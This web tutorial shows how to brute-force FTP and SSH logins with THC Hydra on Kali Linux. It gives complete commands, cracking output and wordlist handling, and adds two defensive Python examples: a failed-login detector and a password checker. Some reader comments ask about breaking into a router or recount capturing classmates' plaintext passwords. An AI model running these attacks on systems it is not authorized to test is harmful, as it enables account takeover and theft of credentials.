Crack passwords in Kali Linux with Hydra

For years, experts have warned about the risks of relying on weak passwords to restrict access to data, and this is still a problem. A rule of thumb for passwords is the longer, the better. In this guide I will use FTP as a target service and will show how to crack passwords in Kali Linux with Hydra.

There are already several login hacker tools available; however, none of them supports more than one protocol to attack or parallelized connects. We’ve previously covered password cracking using John the Ripper, Wireshark, NMAP and MiTM.

Hydra can be used and compiled cleanly on Linux, Windows/Cygwin, Solaris, FreeBSD/OpenBSD, QNX (Blackberry 10) and OSX.

Currently the THC Hydra tool supports the following protocols:

Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

Supported Platforms

  1. All UNIX platforms (linux, *bsd, solaris, etc.)
  2. Mac OS/X
  3. Windows with Cygwin (both IPv4 and IPv6)
  4. Mobile systems based on Linux, Mac OS/X or QNX (e.g. Android, iPhone, Blackberry 10, Zaurus, iPaq)

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely. On Ubuntu it can be installed from the Synaptic package manager. On Kali Linux, it is pre-installed.

For brute forcing Hydra needs a list of passwords. There are lots of password lists available out there. In this example we are going to use the default password list provided with John the Ripper which is another password cracking tool. Other password lists are available online, simply Google it.

The password list is pre-installed on Kali Linux and can be found at the following location:

/usr/share/john/password.lst

It looks like this

#!comment: This list has been compiled by Solar Designer of Openwall Project,
#!comment: http://www.openwall.com/wordlists/
#!comment:
#!comment: This list is based on passwords most commonly seen on a set of Unix
#!comment: systems in mid-1990's, sorted for decreasing number of occurrences
#!comment: (that is, more common passwords are listed first).  It has been
#!comment: revised to also include common website passwords from public lists
#!comment: of "top N passwords" from major community website compromises that
#!comment: occurred in 2006 through 2010.
#!comment:
#!comment: Last update: 2011/11/20 (3546 entries)
123456
12345
password
password1
123456789
12345678
1234567890

Create a copy of that file on your desktop or in any other location and remove the comment lines (all the lines above the password 123456). Now our word list of passwords is ready and we are going to use it to brute force an FTP server to try to crack its password.

Here is the simple command with output

root@kali:~# hydra -t 1 -l admin -P /root/Desktop/password.lst -vV 192.168.1.1 ftp
Hydra v7.4.2 (c)2012 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2013-05-13 04:32:18
[DATA] 1 task, 1 server, 3546 login tries (l:1/p:3546), ~3546 tries per task
[DATA] attacking service ftp on port 21
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "123456" - 1 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "12345" - 2 of 3546 [child 0]
[ATTEMPT] target 192.168.1.1 - login "admin" - pass "password" - 3 of 3546 [child 0]
[21][ftp] host: 192.168.1.1   login: admin   password: password
[STATUS] attack finished for 192.168.1.1 (waiting for children to complete tests)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2013-05-13 04:32:33
root@kali:~#

Check the line “[21][ftp]”. It shows the username/password combination that worked for the FTP server. Quite easy!

Now let's take a look at the options. The “t” option tells Hydra how many parallel threads to create. In this case I used 1 because many routers cannot handle multiple connections and would freeze or hang for a short while. To avoid this, it's better to do 1 attempt at a time. The next option is “l”, which gives the username or login to use. In this case it's admin. Next comes the capital “P” option, which provides the word list to use. Hydra will pick up each line as a single password and use it.

The “v” option is for verbose and the capital “V” option is for showing every password being tried. Last comes the host/IP address followed by the service to crack.
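
Seen from the server side, the run above is two failed logins and then a success from one client, which a failure-count threshold alone never flags; this added example (not part of the original article) is a small detector that catches both that pattern and a longer guessing burst. The log lines are constructed in the style of vsftpd's log file, and the function name and thresholds are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in the style of vsftpd's log file (format assumed for this example).
SAMPLE_LOG = """\
Mon May 13 04:32:19 2013 [pid 2101] [admin] FAIL LOGIN: Client "192.168.1.50"
Mon May 13 04:32:24 2013 [pid 2103] [admin] FAIL LOGIN: Client "192.168.1.50"
Mon May 13 04:32:29 2013 [pid 2105] [admin] OK LOGIN: Client "192.168.1.50"
Mon May 13 09:10:02 2013 [pid 2300] [backup] FAIL LOGIN: Client "192.168.1.77"
Mon May 13 09:10:40 2013 [pid 2302] [backup] OK LOGIN: Client "192.168.1.77"
Mon May 13 11:00:01 2013 [pid 2400] [admin] FAIL LOGIN: Client "192.168.1.90"
Mon May 13 11:00:06 2013 [pid 2402] [admin] FAIL LOGIN: Client "192.168.1.90"
Mon May 13 11:00:11 2013 [pid 2404] [admin] FAIL LOGIN: Client "192.168.1.90"
Mon May 13 11:00:16 2013 [pid 2406] [admin] FAIL LOGIN: Client "192.168.1.90"
Mon May 13 11:00:21 2013 [pid 2408] [admin] FAIL LOGIN: Client "192.168.1.90"
"""

LINE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"')

def detect(log_text, window=timedelta(minutes=5), max_failures=5, min_prior=2):
    """Return a list of (rule, client_ip, user, timestamp) alerts."""
    recent = defaultdict(deque)          # client ip -> timestamps of recent failures
    alerts = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        fails = recent[m["ip"]]
        while fails and ts - fails[0] > window:
            fails.popleft()              # forget failures older than the window
        if m["result"] == "FAIL":
            fails.append(ts)
            if len(fails) == max_failures:          # fire once per burst
                alerts.append(("guessing", m["ip"], m["user"], ts))
        else:
            if len(fails) >= min_prior:             # a guess landed
                alerts.append(("success-after-failures", m["ip"], m["user"], ts))
            fails.clear()                # a success resets the failure streak
    return alerts
```

The single mistyped password from 192.168.1.77 raises nothing, while the two-failures-then-success sequence from 192.168.1.50 does, even though it stays well under the burst threshold.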

THC hydra help menu

root@kali:~# hydra -h
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Syntax: hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e nsr] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-W TIME] [-f] [-s PORT] [-x MIN:MAX:CHARSET] [-SuvV46] [service://server[:PORT][/OPT]]

Options:
  -R        restore a previous aborted/crashed session
  -S        perform an SSL connect
  -s PORT   if the service is on a different default port, define it here
  -l LOGIN or -L FILE  login with LOGIN name, or load several logins from FILE
  -p PASS  or -P FILE  try password PASS, or load several passwords from FILE
  -x MIN:MAX:CHARSET  password bruteforce generation, type "-x -h" to get help
  -e nsr    try "n" null password, "s" login as pass and/or "r" reversed login
  -u        loop around users, not passwords (effective! implied with -x)
  -C FILE   colon separated "login:pass" format, instead of -L/-P options
  -M FILE   list of servers to be attacked in parallel, one entry per line
  -o FILE   write found login/password pairs to FILE instead of stdout
  -f / -F   exit when a login/pass pair is found (-M: -f per host, -F global)
  -t TASKS  run TASKS number of connects in parallel (per host, default: 16)
  -w / -W TIME  waittime for responses (32s) / between connects per thread
  -4 / -6   prefer IPv4 (default) or IPv6 addresses
  -v / -V / -d  verbose mode / show login+pass for each attempt / debug mode
  -U        service module usage details
  server    the target server (use either this OR the -M option)
  service   the service to crack (see below for supported protocols)
  OPT       some service modules support additional input (-U for module help)

Supported services: asterisk afp cisco cisco-enable cvs firebird ftp ftps http[s]-{head|get} http[s]-{get|post}-form http-proxy http-proxy-urlenum icq imap[s] irc ldap2[s] ldap3[-{cram|digest}md5][s] mssql mysql ncp nntp oracle-listener oracle-sid pcanywhere pcnfs pop3[s] postgres rdp rexec rlogin rsh s7-300 sip smb smtp[s] smtp-enum snmp socks5 ssh sshkey svn teamspeak telnet[s] vmauthd vnc xmpp

Hydra is a tool to guess/crack valid login/password pairs - usage only allowed
for legal purposes. This tool is licensed under AGPL v3.0.
The newest version is always available at http://www.thc.org/thc-hydra
These services were not compiled in: sapr3 oracle.

Use HYDRA_PROXY_HTTP or HYDRA_PROXY - and if needed HYDRA_PROXY_AUTH - environment for a proxy setup.
E.g.:  % export HYDRA_PROXY=socks5://127.0.0.1:9150 (or socks4:// or connect://)
       % export HYDRA_PROXY_HTTP=http://proxy:8080
       % export HYDRA_PROXY_AUTH=user:pass

Examples:
  hydra -l user -P passlist.txt ftp://192.168.0.1
  hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
  hydra -C defaults.txt -6 pop3s://[fe80::2c:31ff:fe12:ac11]:143/TLS:DIGEST-MD5

hydra Usage Example

Attempt to login as the root user (-l root) using a password list (-P /usr/share/wordlists/metasploit/unix_passwords.txt) with 6 threads (-t 6) on the given SSH server (ssh://192.168.1.123):

root@kali:~# hydra -l root -P /usr/share/wordlists/metasploit/unix_passwords.txt -t 6 ssh://192.168.1.123
Hydra v7.6 (c)2013 by van Hauser/THC & David Maciejak - for legal purposes only

Hydra (http://www.thc.org/thc-hydra) starting at 2014-05-19 07:53:33
[DATA] 6 tasks, 1 server, 1003 login tries (l:1/p:1003), ~167 tries per task
[DATA] attacking service ssh on port 22

Brute forcing is the most basic form of password cracking. It works well with devices like routers, which are mostly configured with their default passwords. However, when it comes to other systems, brute forcing will not work unless you are very lucky.

However, brute forcing is still good practice for hackers, so you should keep trying all techniques to hack a system. So keep hacking!!

Additional tools bundled with THC Hydra

pw-inspector

It reads passwords in and prints those which meet the requirements.

pw-inspector help menu

root@kali:~# pw-inspector
PW-Inspector v0.2 (c) 2005 by van Hauser / THC vh@thc.org [http://www.thc.org]

Syntax: pw-inspector [-i FILE] [-o FILE] [-m MINLEN] [-M MAXLEN] [-c MINSETS] -l -u -n -p -s

Options:
  -i FILE    file to read passwords from (default: stdin)
  -o FILE    file to write valid passwords to (default: stdout)
  -m MINLEN  minimum length of a valid password
  -M MAXLEN  maximum length of a valid password
  -c MINSETS the minimum number of sets required (default: all given)
Sets:
  -l         lowcase characters (a,b,c,d, etc.)
  -u         upcase characters (A,B,C,D, etc.)
  -n         numbers (1,2,3,4, etc.)
  -p         printable characters (which are not -l/-n/-p, e.g. $,!,/,(,*, etc.)
  -s         special characters - all others not withint the sets above

PW-Inspector reads passwords in and prints those which meet the requirements.
The return code is the number of valid passwords found, 0 if none was found.
Use for security: check passwords, if 0 is returned, reject password choice.
Use for hacking: trim your dictionary file to the pw requirements of the target.
Usage only allowed for legal purposes.

pw-inspector Usage Example

Read in a list of passwords (-i /usr/share/wordlists/nmap.lst) and save to a file (-o /root/passes.txt), selecting passwords of a minimum length of 6 (-m 6) and a maximum length of 10 (-M 10):

root@kali:~# pw-inspector -i /usr/share/wordlists/nmap.lst -o /root/passes.txt -m 6 -M 10
root@kali:~# wc -l /usr/share/wordlists/nmap.lst
5086 /usr/share/wordlists/nmap.lst
root@kali:~# wc -l /root/passes.txt
4490 /root/passes.txt
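
The "use for security" mode from the help text, taken one step further in an added example (not from the original article or from THC): a length-and-character-set rule modelled on the pw-inspector options accepts `password1`, the fourth entry in the list Hydra was given, so the check also looks the candidate up in the wordlist and rejects the login-derived guesses that Hydra's `-e nsr` tries. The function names, thresholds, the short inline wordlist and the exact set boundaries are assumptions.

```python
import string

# Constructed stand-in for the top of /usr/share/john/password.lst shown earlier.
COMMON = {"123456", "12345", "password", "password1",
          "123456789", "12345678", "1234567890"}

def char_sets(pw):
    """Character classes present, approximating the pw-inspector sets -l -u -n -p -s."""
    sets = set()
    for ch in pw:
        if ch in string.ascii_lowercase:
            sets.add("l")
        elif ch in string.ascii_uppercase:
            sets.add("u")
        elif ch in string.digits:
            sets.add("n")
        elif ch in string.punctuation:
            sets.add("p")
        else:
            sets.add("s")
    return sets

def check_password(pw, login="", min_len=6, max_len=64, min_sets=2, wordlist=COMMON):
    """Return a list of rejection reasons; an empty list means the choice is accepted."""
    reasons = []
    if not min_len <= len(pw) <= max_len:      # also rejects the null password ("n")
        reasons.append("length")
    if len(char_sets(pw)) < min_sets:
        reasons.append("too-few-character-sets")
    if pw.lower() in wordlist:                 # what a dictionary run tries first
        reasons.append("in-wordlist")
    # Login as password ("s") and reversed login ("r"), as in Hydra's -e nsr.
    if login and pw.lower() in {login.lower(), login.lower()[::-1]}:
        reasons.append("derived-from-login")
    return reasons
```

In production the inline set would be replaced by the full wordlist file loaded into a set, with the same lookup.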

			

Resources

Source: http://www.thc.org/thc-hydra/

  • Author: Van Hauser, Roland Kessler

11 comments

  1. but you need wordlist :/

    • That is why the author mentioned people still making mistake of not making their password secure enough, basically this to get low hanging fruits for further recon

  2. i want to hack a tenda 11n router by hydra its not have admin or username its only have password

  3. in ifconfig i can't find inet addr ? need help

  4. when I type the command /usr/share/john/password.lst it is showing the permission denied
    is there any solution

  5. uh come back when you can bruteforce passwords such as aiVu/tiedae7aix9oeg%aeveipoo*nohquocheizee9Phae#mei:V3dooj=u*ibo in real time (or close to) on affordable hardware

    • bruh bruteforcing a password takes at least 14 hours for an average 7 letter password… you will have more success calling and asking them for their password

  6. i know which this doesn’t seem very impressive to me

    wordlists/rainbowtables can get huge fast, rainbowtables have problems of their own, foreign languages can make wordlists useless

    and, like you said, bruteforcing takes a long time (we brute forced a few md5 hashes for our classes php board back in 2003 and the longest one we got was 7 chars long and took days on a dualcpu p3 450mhz), then i thought about it and just modified the login page to store the unencrypted password…. everyone wondered how we could do any password at once :)

  7. i have getting this like cracking with hydra

  8. We interviewed the developer of THC Hydra – thought you’d be interested to read their comments:

    https://www.concise-courses.com/interview-thc-hydra/
